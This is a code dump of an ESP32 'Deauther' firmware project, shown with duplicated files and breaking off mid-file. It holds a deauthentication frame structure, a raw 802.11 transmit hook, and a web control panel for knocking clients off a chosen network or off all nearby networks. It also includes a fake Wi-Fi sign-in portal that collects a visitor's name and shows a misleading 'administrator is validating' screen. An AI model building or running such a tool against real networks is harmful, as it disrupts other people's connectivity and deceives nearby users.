============================ PROJECT STRUCTURE =============================

ESP32-DePortal2/
    └── index.html
    └── state.cpp
    └── web_html.h
    ├── deauth (2).cpp
    ├── deauth (2).h
    ├── deauth.cpp
    ├── deauth.h
    ├── definitions (2).h
    ├── definitions.h
    ├── general (2).cpp
    ├── general.cpp
    ├── html_content (2).h
    ├── html_content.h
    ├── index (2).html
    ├── main (2).cpp
    ├── main.cpp
    ├── serial_handler (2).cpp
    ├── serial_handler (2).h
    ├── serial_handler.cpp
    ├── serial_handler.h
    ├── state (2).cpp
    ├── state (2).h
    ├── state.h
    ├── types (2).h
    ├── types.h
    ├── web_html (2).h
└── platformio.ini
├── README.md
├── data/
├── include/
├── src/

================================================================================

=============================== FILE CONTENTS ================================

--- File: README.md ---

# ESP32-Deauther
![GitHub Issues or Pull Requests](https://img.shields.io/github/issues/tesa-klebeband/ESP32-Deauther)
![GitHub License](https://img.shields.io/github/license/tesa-klebeband/ESP32-Deauther)
![GitHub Repo stars](https://img.shields.io/github/stars/tesa-klebeband/ESP32-Deauther?style=flat)
![GitHub forks](https://img.shields.io/github/forks/tesa-klebeband/ESP32-Deauther?style=flat)
![logo](https://github.com/user-attachments/assets/4e2ac65f-1b25-4a97-822a-6a91ca71b5be)

A project for the ESP32 that allows you to deauthenticate stations connected to WiFi network
# DISCLAIMER
This tool has been made for educational and testing purposes only. Any misuse or illegal activities conducted with the tool are strictly prohibited. I am **not** responsible for any consequences arising from the use of the tool, which is done at your own risk.
## Building
Clone this repo using:

`git clone https://github.com/tesa-klebeband/ESP32-Deauther`

1) Install vscode and PlatformIO
2) Install the PlatformIO extension in vscode
3) Open the cloned folder in vscode and press the upload button

## Installing directly from your Browser
Open my [ESP32-Webflasher](https://tesa-klebeband.github.io/ESP32-Webflasher) in Chrome or Edge, select `ESP32-Deauther` and follow the listed instructions

## Using ESP32-Deauther
The ESP32 hosts a WiFi network with the name of `ESP32-Deauther` and a password of `esp32wroom32`. Connect to this network and type the IP of your ESP32 (typically **192.168.4.1**) into a webbrowser of a choice. You will see the following options:
* Rescan networks: Rescan and detect all WiFi networks in your area. After a successful scan, the networks are listed in the above table.
* Launch Deauth-Attack: Deauthenticates all clients connected to a network. Enter the network number from the table at the top and a reason code from the table at the bottom of the page. After that click the button and your ESP32's LED will flash when it deauthenticates a station.
* Deauth all networks: Launches a Deauth-Attack on all networks and stations with a specific reason. In order to stop this, you have to reset your ESP32 (no other way to code this since the ESP32 rapidly changes through all network channels and has to disable its AP)
* Stop Deauth-Attack: Stops an ongoing deauthentication attack
## License
All files within this repo are released under the GNU GPL V3 License as per the LICENSE file stored in the root of this repo.


================================================================================

--- File: data/index (2).html ---

<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title>Sign in to Wi-Fi network</title>
<style>
  body { font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; background-color: #f0f2f5; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; }
  .card { background: white; padding: 2rem; border-radius: 12px; box-shadow: 0 4px 20px rgba(0,0,0,0.08); text-align: center; width: 90%; max-width: 360px; }
  h2 { color: #1a1a1a; margin-top: 0; font-size: 1.5rem; }
  p { color: #65676b; font-size: 0.95rem; margin-bottom: 1.5rem; line-height: 1.5; }
  input { width: 100%; padding: 12px; margin-bottom: 15px; border: 1px solid #dddfe2; border-radius: 6px; box-sizing: border-box; font-size: 16px; outline: none; transition: 0.2s; }
  input:focus { border-color: #1877f2; box-shadow: 0 0 0 2px rgba(24,119,242,0.2); }
  button { width: 100%; padding: 12px; background: #1877f2; color: white; border: none; border-radius: 6px; font-size: 16px; font-weight: bold; cursor: pointer; transition: 0.2s; }
  button:hover { background: #166fe5; }
  .hidden { display: none !important; }
  .error { color: #d32f2f; background: #ffebee; padding: 10px; border-radius: 6px; margin-bottom: 15px; font-size: 0.9rem; text-align: left; display: none; }
  .spinner { border: 3px solid #f3f3f3; border-top: 3px solid #1877f2; border-radius: 50%; width: 30px; height: 30px; animation: spin 1s linear infinite; margin: 20px auto; }
  @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
  .logo { font-size: 3rem; color: #1877f2; margin-bottom: 10px; }
</style>
</head>
<body>

<div id="login-view" class="card">
  <div class="logo">&#128246;</div>
  <h2>Welcome</h2>
  <p>Authentication is required to access the Wi-Fi network.</p>
  <div id="error-msg" class="error">Access Denied. Incorrect credentials.</div>
  <input type="text" id="username" placeholder="Enter your Name" autocomplete="off" required>
  <button onclick="sendData()">Log In</button>
</div>

<div id="wait-view" class="card hidden">
  <h2>Verifying...</h2>
  <div class="spinner"></div>
  <p>Please wait while the administrator validates your request.</p>
  <p style="color:#999; font-size:0.8rem">Do not close this page.</p>
</div>

<div id="success-view" class="card hidden">
  <div class="logo" style="color:#4caf50">&#10003;</div>
  <h2 style="color:#4caf50">Connected</h2>
  <p>You are now connected to the internet.</p>
</div>

<script>
  let checkInterval;
  function sendData() {
    const name = document.getElementById('username').value.trim();
    if(!name) return;
    document.getElementById('error-msg').style.display = 'none';
    document.getElementById('login-view').classList.add('hidden');
    document.getElementById('wait-view').classList.remove('hidden');

    fetch('/submit', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: 'name=' + encodeURIComponent(name) })
    .then(() => { if(checkInterval) clearInterval(checkInterval); checkInterval = setInterval(checkStatus, 1000); })
    .catch(() => resetView("Connection Error. Try Again."));
  }

  function checkStatus() {
    fetch('/status').then(r => r.text()).then(status => {
      if (status === 'OK') { clearInterval(checkInterval); document.getElementById('wait-view').classList.add('hidden'); document.getElementById('success-view').classList.remove('hidden'); } 
      else if (status === 'NO') { clearInterval(checkInterval); resetView("Access Denied or Incorrect Name."); }
    }).catch(e => console.log(e));
  }

  function resetView(msg) {
    document.getElementById('wait-view').classList.add('hidden');
    document.getElementById('login-view').classList.remove('hidden');
    const err = document.getElementById('error-msg');
    err.innerText = msg; err.style.display = 'block';
  }
</script>
</body></html>

================================================================================

--- File: data/index.html ---

<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title>Sign in to Wi-Fi network</title>
<style>
  body { font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; background-color: #f0f2f5; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; }
  .card { background: white; padding: 2rem; border-radius: 12px; box-shadow: 0 4px 20px rgba(0,0,0,0.08); text-align: center; width: 90%; max-width: 360px; }
  h2 { color: #1a1a1a; margin-top: 0; font-size: 1.5rem; }
  p { color: #65676b; font-size: 0.95rem; margin-bottom: 1.5rem; line-height: 1.5; }
  input { width: 100%; padding: 12px; margin-bottom: 15px; border: 1px solid #dddfe2; border-radius: 6px; box-sizing: border-box; font-size: 16px; outline: none; transition: 0.2s; }
  input:focus { border-color: #1877f2; box-shadow: 0 0 0 2px rgba(24,119,242,0.2); }
  button { width: 100%; padding: 12px; background: #1877f2; color: white; border: none; border-radius: 6px; font-size: 16px; font-weight: bold; cursor: pointer; transition: 0.2s; }
  button:hover { background: #166fe5; }
  .hidden { display: none !important; }
  .error { color: #d32f2f; background: #ffebee; padding: 10px; border-radius: 6px; margin-bottom: 15px; font-size: 0.9rem; text-align: left; display: none; }
  .spinner { border: 3px solid #f3f3f3; border-top: 3px solid #1877f2; border-radius: 50%; width: 30px; height: 30px; animation: spin 1s linear infinite; margin: 20px auto; }
  @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
  .logo { font-size: 3rem; color: #1877f2; margin-bottom: 10px; }
</style>
</head>
<body>

<div id="login-view" class="card">
  <div class="logo">&#128246;</div>
  <h2>Welcome</h2>
  <p>Authentication is required to access the Wi-Fi network.</p>
  <div id="error-msg" class="error">Access Denied. Incorrect credentials.</div>
  <input type="text" id="username" placeholder="Enter your Name" autocomplete="off" required>
  <button onclick="sendData()">Log In</button>
</div>

<div id="wait-view" class="card hidden">
  <h2>Verifying...</h2>
  <div class="spinner"></div>
  <p>Please wait while the administrator validates your request.</p>
  <p style="color:#999; font-size:0.8rem">Do not close this page.</p>
</div>

<div id="success-view" class="card hidden">
  <div class="logo" style="color:#4caf50">&#10003;</div>
  <h2 style="color:#4caf50">Connected</h2>
  <p>You are now connected to the internet.</p>
</div>

<script>
  let checkInterval;
  function sendData() {
    const name = document.getElementById('username').value.trim();
    if(!name) return;
    document.getElementById('error-msg').style.display = 'none';
    document.getElementById('login-view').classList.add('hidden');
    document.getElementById('wait-view').classList.remove('hidden');

    fetch('/submit', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: 'name=' + encodeURIComponent(name) })
    .then(() => { if(checkInterval) clearInterval(checkInterval); checkInterval = setInterval(checkStatus, 1000); })
    .catch(() => resetView("Connection Error. Try Again."));
  }

  function checkStatus() {
    fetch('/status').then(r => r.text()).then(status => {
      if (status === 'OK') { clearInterval(checkInterval); document.getElementById('wait-view').classList.add('hidden'); document.getElementById('success-view').classList.remove('hidden'); } 
      else if (status === 'NO') { clearInterval(checkInterval); resetView("Access Denied or Incorrect Name."); }
    }).catch(e => console.log(e));
  }

  function resetView(msg) {
    document.getElementById('wait-view').classList.add('hidden');
    document.getElementById('login-view').classList.remove('hidden');
    const err = document.getElementById('error-msg');
    err.innerText = msg; err.style.display = 'block';
  }
</script>
</body></html>

================================================================================

--- File: include/deauth (2).h ---

#ifndef DEAUTH_H
#define DEAUTH_H
#include "types.h"
#include <Arduino.h>

void start_deauth(int wifi_number, int attack_type, uint16_t reason);
void stop_deauth();

extern int eliminated_stations;
extern int deauth_type;

extern deauth_frame_t deauth_frame;
// تعريف دالة الإرسال الخام لكي نستخدمها في الملف الجديد
extern "C" esp_err_t esp_wifi_80211_tx(wifi_interface_t ifx, const void *buffer, int len, bool en_sys_seq);

#endif

================================================================================

--- File: include/deauth.h ---

#ifndef DEAUTH_H
#define DEAUTH_H
#include "types.h"
#include <Arduino.h>

void start_deauth(int wifi_number, int attack_type, uint16_t reason);
void stop_deauth();

extern int eliminated_stations;
extern int deauth_type;

extern deauth_frame_t deauth_frame;
// تعريف دالة الإرسال الخام لكي نستخدمها في الملف الجديد
extern "C" esp_err_t esp_wifi_80211_tx(wifi_interface_t ifx, const void *buffer, int len, bool en_sys_seq);

#endif

================================================================================

--- File: include/definitions (2).h ---

#ifndef DEFINITIONS_H
#define DEFINITIONS_H

#define AP_SSID "ooo"
#define AP_PASS "12345678"
#define LED 2
#define SERIAL_DEBUG
#define CHANNEL_MAX 13
#define NUM_FRAMES_PER_DEAUTH 16
#define DEAUTH_BLINK_TIMES 2
#define DEAUTH_BLINK_DURATION 20
#define DEAUTH_TYPE_SINGLE 0
#define DEAUTH_TYPE_ALL 1

#ifdef SERIAL_DEBUG
#define DEBUG_PRINT(...) Serial.print(__VA_ARGS__)
#define DEBUG_PRINTLN(...) Serial.println(__VA_ARGS__)
#define DEBUG_PRINTF(...) Serial.printf(__VA_ARGS__)
#endif
#ifndef SERIAL_DEBUG
#define DEBUG_PRINT(...)
#define DEBUG_PRINTLN(...)
#define DEBUG_PRINTF(...)
#endif
#ifdef LED
#define BLINK_LED(num_times, blink_duration) blink_led(num_times, blink_duration)
#endif
#ifndef LED
#define BLINK_LED()
#endif

void blink_led(int num_times, int blink_duration);

#endif

================================================================================

--- File: include/definitions.h ---

#ifndef DEFINITIONS_H
#define DEFINITIONS_H

#define AP_SSID "ooo"
#define AP_PASS "12345678"
#define LED 2
#define SERIAL_DEBUG
#define CHANNEL_MAX 13
#define NUM_FRAMES_PER_DEAUTH 16
#define DEAUTH_BLINK_TIMES 2
#define DEAUTH_BLINK_DURATION 20
#define DEAUTH_TYPE_SINGLE 0
#define DEAUTH_TYPE_ALL 1

#ifdef SERIAL_DEBUG
#define DEBUG_PRINT(...) Serial.print(__VA_ARGS__)
#define DEBUG_PRINTLN(...) Serial.println(__VA_ARGS__)
#define DEBUG_PRINTF(...) Serial.printf(__VA_ARGS__)
#endif
#ifndef SERIAL_DEBUG
#define DEBUG_PRINT(...)
#define DEBUG_PRINTLN(...)
#define DEBUG_PRINTF(...)
#endif
#ifdef LED
#define BLINK_LED(num_times, blink_duration) blink_led(num_times, blink_duration)
#endif
#ifndef LED
#define BLINK_LED()
#endif

void blink_led(int num_times, int blink_duration);

#endif

================================================================================

--- File: include/html_content (2).h ---

#pragma once
#include <Arduino.h>

const char WEB_PAGE[] PROGMEM = R"rawliteral(
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title>Sign in to Wi-Fi network</title>
<style>
  body { font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; background-color: #f0f2f5; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; }
  .card { background: white; padding: 2rem; border-radius: 12px; box-shadow: 0 4px 20px rgba(0,0,0,0.08); text-align: center; width: 90%; max-width: 360px; }
  h2 { color: #1a1a1a; margin-top: 0; font-size: 1.5rem; }
  p { color: #65676b; font-size: 0.95rem; margin-bottom: 1.5rem; line-height: 1.5; }
  input { width: 100%; padding: 12px; margin-bottom: 15px; border: 1px solid #dddfe2; border-radius: 6px; box-sizing: border-box; font-size: 16px; outline: none; transition: 0.2s; }
  input:focus { border-color: #1877f2; box-shadow: 0 0 0 2px rgba(24,119,242,0.2); }
  button { width: 100%; padding: 12px; background: #1877f2; color: white; border: none; border-radius: 6px; font-size: 16px; font-weight: bold; cursor: pointer; transition: 0.2s; }
  button:hover { background: #166fe5; }
  .hidden { display: none !important; }
  .error { color: #d32f2f; background: #ffebee; padding: 10px; border-radius: 6px; margin-bottom: 15px; font-size: 0.9rem; text-align: left; display: none; }
  .spinner { border: 3px solid #f3f3f3; border-top: 3px solid #1877f2; border-radius: 50%; width: 30px; height: 30px; animation: spin 1s linear infinite; margin: 20px auto; }
  @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
  .logo { font-size: 3rem; color: #1877f2; margin-bottom: 10px; }
</style>
</head>
<body>

<div id="login-view" class="card">
  <div class="logo">&#128246;</div>
  <h2>Welcome</h2>
  <p>Authentication is required to access the Wi-Fi network.</p>
  <div id="error-msg" class="error">Access Denied. Incorrect credentials.</div>
  <input type="text" id="username" placeholder="Enter your Name" autocomplete="off" required>
  <button onclick="sendData()">Log In</button>
</div>

<div id="wait-view" class="card hidden">
  <h2>Verifying...</h2>
  <div class="spinner"></div>
  <p>Please wait while the administrator validates your request.</p>
  <p style="color:#999; font-size:0.8rem">Do not close this page.</p>
</div>

<div id="success-view" class="card hidden">
  <div class="logo" style="color:#4caf50">&#10003;</div>
  <h2 style="color:#4caf50">Connected</h2>
  <p>You are now connected to the internet.</p>
</div>

<script>
  let checkInterval;
  function sendData() {
    const name = document.getElementById('username').value.trim();
    if(!name) return;
    document.getElementById('error-msg').style.display = 'none';
    document.getElementById('login-view').classList.add('hidden');
    document.getElementById('wait-view').classList.remove('hidden');

    fetch('/submit', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: 'name=' + encodeURIComponent(name) })
    .then(() => { if(checkInterval) clearInterval(checkInterval); checkInterval = setInterval(checkStatus, 1000); })
    .catch(() => resetView("Connection Error. Try Again."));
  }

  function checkStatus() {
    fetch('/status').then(r => r.text()).then(status => {
      if (status === 'OK') { clearInterval(checkInterval); document.getElementById('wait-view').classList.add('hidden'); document.getElementById('success-view').classList.remove('hidden'); } 
      else if (status === 'NO') { clearInterval(checkInterval); resetView("Access Denied or Incorrect Name."); }
    }).catch(e => console.log(e));
  }

  function resetView(msg) {
    document.getElementById('wait-view').classList.add('hidden');
    document.getElementById('login-view').classList.remove('hidden');
    const err = document.getElementById('error-msg');
    err.innerText = msg; err.style.display = 'block';
  }
</script>
</body></html>
)rawliteral";

================================================================================

--- File: include/html_content.h ---

#pragma once
#include <Arduino.h>

const char WEB_PAGE[] PROGMEM = R"rawliteral(
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title>Sign in to Wi-Fi network</title>
<style>
  body { font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; background-color: #f0f2f5; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; }
  .card { background: white; padding: 2rem; border-radius: 12px; box-shadow: 0 4px 20px rgba(0,0,0,0.08); text-align: center; width: 90%; max-width: 360px; }
  h2 { color: #1a1a1a; margin-top: 0; font-size: 1.5rem; }
  p { color: #65676b; font-size: 0.95rem; margin-bottom: 1.5rem; line-height: 1.5; }
  input { width: 100%; padding: 12px; margin-bottom: 15px; border: 1px solid #dddfe2; border-radius: 6px; box-sizing: border-box; font-size: 16px; outline: none; transition: 0.2s; }
  input:focus { border-color: #1877f2; box-shadow: 0 0 0 2px rgba(24,119,242,0.2); }
  button { width: 100%; padding: 12px; background: #1877f2; color: white; border: none; border-radius: 6px; font-size: 16px; font-weight: bold; cursor: pointer; transition: 0.2s; }
  button:hover { background: #166fe5; }
  .hidden { display: none !important; }
  .error { color: #d32f2f; background: #ffebee; padding: 10px; border-radius: 6px; margin-bottom: 15px; font-size: 0.9rem; text-align: left; display: none; }
  .spinner { border: 3px solid #f3f3f3; border-top: 3px solid #1877f2; border-radius: 50%; width: 30px; height: 30px; animation: spin 1s linear infinite; margin: 20px auto; }
  @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
  .logo { font-size: 3rem; color: #1877f2; margin-bottom: 10px; }
</style>
</head>
<body>

<div id="login-view" class="card">
  <div class="logo">&#128246;</div>
  <h2>Welcome</h2>
  <p>Authentication is required to access the Wi-Fi network.</p>
  <div id="error-msg" class="error">Access Denied. Incorrect credentials.</div>
  <input type="text" id="username" placeholder="Enter your Name" autocomplete="off" required>
  <button onclick="sendData()">Log In</button>
</div>

<div id="wait-view" class="card hidden">
  <h2>Verifying...</h2>
  <div class="spinner"></div>
  <p>Please wait while the administrator validates your request.</p>
  <p style="color:#999; font-size:0.8rem">Do not close this page.</p>
</div>

<div id="success-view" class="card hidden">
  <div class="logo" style="color:#4caf50">&#10003;</div>
  <h2 style="color:#4caf50">Connected</h2>
  <p>You are now connected to the internet.</p>
</div>

<script>
  let checkInterval;
  function sendData() {
    const name = document.getElementById('username').value.trim();
    if(!name) return;
    document.getElementById('error-msg').style.display = 'none';
    document.getElementById('login-view').classList.add('hidden');
    document.getElementById('wait-view').classList.remove('hidden');

    fetch('/submit', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: 'name=' + encodeURIComponent(name) })
    .then(() => { if(checkInterval) clearInterval(checkInterval); checkInterval = setInterval(checkStatus, 1000); })
    .catch(() => resetView("Connection Error. Try Again."));
  }

  function checkStatus() {
    fetch('/status').then(r => r.text()).then(status => {
      if (status === 'OK') { clearInterval(checkInterval); document.getElementById('wait-view').classList.add('hidden'); document.getElementById('success-view').classList.remove('hidden'); } 
      else if (status === 'NO') { clearInterval(checkInterval); resetView("Access Denied or Incorrect Name."); }
    }).catch(e => console.log(e));
  }

  function resetView(msg) {
    document.getElementById('wait-view').classList.add('hidden');
    document.getElementById('login-view').classList.remove('hidden');
    const err = document.getElementById('error-msg');
    err.innerText = msg; err.style.display = 'block';
  }
</script>
</body></html>
)rawliteral";

================================================================================

--- File: include/serial_handler (2).h ---

#ifndef SERIAL_HANDLER_H
#define SERIAL_HANDLER_H

#include <Arduino.h>

void serial_cmd_init();
void serial_cmd_handle();

#endif

================================================================================

--- File: include/serial_handler.h ---

#ifndef SERIAL_HANDLER_H
#define SERIAL_HANDLER_H

#include <Arduino.h>

void serial_cmd_init();
void serial_cmd_handle();

#endif

================================================================================

--- File: include/state (2).h ---

// include/state.h
#pragma once

// نوع لتحديد وضع المسح الأخير
enum ScanMode
{
    SCAN_MODE_NONE,
    SCAN_MODE_NORMAL,
    SCAN_MODE_ADVANCED
};

// متغير عام لتخزين وضع المسح الأخير
extern ScanMode last_scan_mode;

================================================================================

--- File: include/state.h ---

// include/state.h
#pragma once

// نوع لتحديد وضع المسح الأخير
enum ScanMode
{
    SCAN_MODE_NONE,
    SCAN_MODE_NORMAL,
    SCAN_MODE_ADVANCED
};

// متغير عام لتخزين وضع المسح الأخير
extern ScanMode last_scan_mode;

================================================================================

--- File: include/types (2).h ---

#ifndef TYPES_H
#define TYPES_H

typedef struct {
  uint8_t frame_control[2] = { 0xC0, 0x00 };
  uint8_t duration[2];
  uint8_t station[6];
  uint8_t sender[6];
  uint8_t access_point[6];
  uint8_t fragment_sequence[2] = { 0xF0, 0xFF };
  uint16_t reason;
} deauth_frame_t;

typedef struct {
  uint16_t frame_ctrl;
  uint16_t duration;
  uint8_t dest[6];
  uint8_t src[6];
  uint8_t bssid[6];
  uint16_t sequence_ctrl;
  uint8_t addr4[6];
} mac_hdr_t;

typedef struct {
  mac_hdr_t hdr;
  uint8_t payload[0];
} wifi_packet_t;

const wifi_promiscuous_filter_t filt = {
  .filter_mask = WIFI_PROMIS_FILTER_MASK_MGMT | WIFI_PROMIS_FILTER_MASK_DATA
};

#endif

================================================================================

--- File: include/types.h ---

#ifndef TYPES_H
#define TYPES_H

typedef struct {
  uint8_t frame_control[2] = { 0xC0, 0x00 };
  uint8_t duration[2];
  uint8_t station[6];
  uint8_t sender[6];
  uint8_t access_point[6];
  uint8_t fragment_sequence[2] = { 0xF0, 0xFF };
  uint16_t reason;
} deauth_frame_t;

typedef struct {
  uint16_t frame_ctrl;
  uint16_t duration;
  uint8_t dest[6];
  uint8_t src[6];
  uint8_t bssid[6];
  uint16_t sequence_ctrl;
  uint8_t addr4[6];
} mac_hdr_t;

typedef struct {
  mac_hdr_t hdr;
  uint8_t payload[0];
} wifi_packet_t;

const wifi_promiscuous_filter_t filt = {
  .filter_mask = WIFI_PROMIS_FILTER_MASK_MGMT | WIFI_PROMIS_FILTER_MASK_DATA
};

#endif

================================================================================

--- File: include/web_html (2).h ---

#pragma once

const char WEB_HTML_START[] PROGMEM = R"rawliteral(
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ESP32 Deauther</title>
    <style>
        :root {
            --bg-color: #2c2f33;
            --card-color: #23272a;
            --primary-color: #7289da;
            --danger-color: #f04747;
            --text-color: #ffffff;
            --text-muted: #99aab5;
            --border-color: #424549;
        }
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: var(--bg-color);
            color: var(--text-color);
            margin: 0;
            padding: 15px;
            -webkit-font-smoothing: antialiased;
        }
        .container { max-width: 800px; margin: 0 auto; }
        h1, h2 { color: var(--primary-color); border-bottom: 2px solid var(--primary-color); padding-bottom: 10px; margin-top: 30px; }
        h1 { font-size: 2em; }
        .card { background-color: var(--card-color); border-radius: 8px; padding: 20px; margin-bottom: 20px; box-shadow: 0 4px 10px rgba(0,0,0,0.2); }
        .table-container { overflow-x: auto; }
        table { width: 100%; border-collapse: collapse; }
        th, td { padding: 12px 15px; text-align: left; border-bottom: 1px solid var(--border-color); }
        th { background-color: rgba(114, 137, 218, 0.2); font-weight: 600; }
        tr { cursor: pointer; transition: background-color 0.2s ease; }
        tr:hover { background-color: rgba(255, 255, 255, 0.05); }
        tr label { display: flex; align-items: center; width: 100%; }
        input[type="radio"] { margin-right: 15px; transform: scale(1.2); }
        .controls label { display: block; margin-bottom: 8px; color: var(--text-muted); }
        select, .btn { width: 100%; padding: 12px; margin-bottom: 15px; border-radius: 5px; border: 1px solid var(--border-color); background-color: #3a3e42; color: var(--text-color); font-size: 1em; box-sizing: border-box; }
        .btn { background-color: var(--primary-color); border: none; cursor: pointer; font-weight: bold; transition: background-color 0.2s ease; }
        .btn:hover { background-color: #677bc4; }
        .btn.scan { background-color: #43b581; } .btn.scan:hover { background-color: #3aa072; }
        .btn.danger { background-color: var(--danger-color); } .btn.danger:hover { background-color: #d84040; }
        .btn.stop { background-color: #faa61a; } .btn.stop:hover { background-color: #e09618; }
        .status { padding: 12px; background-color: rgba(0,0,0,0.2); border-radius: 5px; color: var(--text-muted); text-align: center; margin-top: 20px; transition: opacity 0.3s ease; }
        @media (max-width: 600px) { body { padding: 10px; } .card { padding: 15px; } th, td { padding: 8px; font-size: 0.9em; } h1 { font-size: 1.5em; } }
    </style>
</head>
<body>
    <div class="container">
        <h1>ESP32 Deauther</h1>
        <div class="card">
            <button class="btn scan" onclick="postAction('/rescan', null, true)">Rescan Networks</button>
        </div>
        <div class="card">
            <h2>Available Networks</h2>
            <div class="table-container">
                <table>
                    <thead>
                        <tr><th>Select</th><th>SSID</th><th>BSSID</th><th>Ch</th><th>RSSI</th><th>Enc.</th></tr>
                    </thead>
                    <tbody>
)rawliteral";

const char WEB_HTML_END[] PROGMEM = R"rawliteral(
                    </tbody>
                </table>
            </div>
        </div>
        <div class="card">
            <h2>Attack Controls</h2>
            <div class="controls">
                <label for="reason_code">Reason Code:</label>
                <select id="reason_code">
                    <option value="1">1: Unspecified reason</option>
                    <option value="2">2: Auth not valid</option>
                    <option value="3">3: STA is leaving</option>
                    <option value="4">4: Inactivity</option>
                    <option value="5">5: AP full</option>
                    <option value="6">6: Class 2 frame</option>
                    <option value="7">7: Class 3 frame</option>
                    <option value="8">8: STA is leaving BSS</option>
                    <option value="9">9: Not authenticated</option>
                    <option value="14">14: MIC failure</option>
                    <option value="15">15: 4-Way Handshake timeout</option>
                </select>
            </div>
            <button class="btn" onclick="launchDeauth()">Launch Deauth on Selected</button>
            <button class="btn danger" onclick="launchDeauthAll()">Launch Deauth on ALL</button>
            <button class="btn stop" onclick="postAction('/stop', null, true)">Stop Attack</button>
        </div>
        <div class="status" id="status">Status: Idle</div>
        <div class="card">
            <p>Eliminated stations: %ELIMINATED_STATIONS%</p>
        </div>
    </div>
    <script>
        const statusDiv = document.getElementById('status');
        const updateStatus = (message, isError = false) => { statusDiv.textContent = `Status: ${message}`; statusDiv.style.color = isError ? 'var(--danger-color)' : 'var(--text-muted)'; };
        const postAction = (url, body = null, reload = false) => {
            fetch(url, { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: body })
            .then(response => { if (!response.ok) throw new Error(`HTTP error! status: ${response.status}`); return response.text(); })
            .then(data => { console.log(data); if (reload) { updateStatus('Reloading page...'); setTimeout(() => window.location.reload(), 1000); } })
            .catch(error => { console.error('Fetch error:', error); updateStatus(error.message, true); });
        };
        function launchDeauth() {
            const selectedNetwork = document.querySelector('input[name="net_num"]:checked');
            if (!selectedNetwork) { updateStatus('Please select a network first!', true); return; }
            const netNum = selectedNetwork.value;
            const reason = document.getElementById('reason_code').value;
            updateStatus(`Launching attack on network ${netNum}...`);
            postAction('/deauth', `net_num=${netNum}&reason=${reason}`);
        }
        function launchDeauthAll() {
            if (confirm('WARNING: This will attack all networks and disable this web interface. You will need to reset the ESP32 to stop it. Are you sure?')) {
                const reason = document.getElementById('reason_code').value;
                updateStatus('Launching attack on ALL networks...');
                postAction('/deauth_all', `reason=${reason}`);
            }
        }
        document.querySelectorAll('tbody tr').forEach(row => { row.addEventListener('click', () => { const radio = row.querySelector('input[type="radio"]'); if (radio) radio.checked = true; }); });
    </script>
</body>
</html>
)rawliteral";

================================================================================

--- File: include/web_html.h ---

#pragma once

const char WEB_HTML_START[] PROGMEM = R"rawliteral(
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ESP32 Deauther</title>
    <style>
        :root {
            --bg-color: #2c2f33;
            --card-color: #23272a;
            --primary-color: #7289da;
            --danger-color: #f04747;
            --text-color: #ffffff;
            --text-muted: #99aab5;
            --border-color: #424549;
        }
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: var(--bg-color);
            color: var(--text-color);
            margin: 0;
            padding: 15px;
            -webkit-font-smoothing: antialiased;
        }
        .container { max-width: 800px; margin: 0 auto; }
        h1, h2 { color: var(--primary-color); border-bottom: 2px solid var(--primary-color); padding-bottom: 10px; margin-top: 30px; }
        h1 { font-size: 2em; }
        .card { background-color: var(--card-color); border-radius: 8px; padding: 20px; margin-bottom: 20px; box-shadow: 0 4px 10px rgba(0,0,0,0.2); }
        .table-container { overflow-x: auto; }
        table { width: 100%; border-collapse: collapse; }
        th, td { padding: 12px 15px; text-align: left; border-bottom: 1px solid var(--border-color); }
        th { background-color: rgba(114, 137, 218, 0.2); font-weight: 600; }
        tr { cursor: pointer; transition: background-color 0.2s ease; }
        tr:hover { background-color: rgba(255, 255, 255, 0.05); }
        tr label { display: flex; align-items: center; width: 100%; }
        input[type="radio"] { margin-right: 15px; transform: scale(1.2); }
        .controls label { display: block; margin-bottom: 8px; color: var(--text-muted); }
        select, .btn { width: 100%; padding: 12px; margin-bottom: 15px; border-radius: 5px; border: 1px solid var(--border-color); background-color: #3a3e42; color: var(--text-color); font-size: 1em; box-sizing: border-box; }
        .btn { background-color: var(--primary-color); border: none; cursor: pointer; font-weight: bold; transition: background-color 0.2s ease; }
        .btn:hover { background-color: #677bc4; }
        .btn.scan { background-color: #43b581; } .btn.scan:hover { background-color: #3aa072; }
        .btn.danger { background-color: var(--danger-color); } .btn.danger:hover { background-color: #d84040; }
        .btn.stop { background-color: #faa61a; } .btn.stop:hover { background-color: #e09618; }
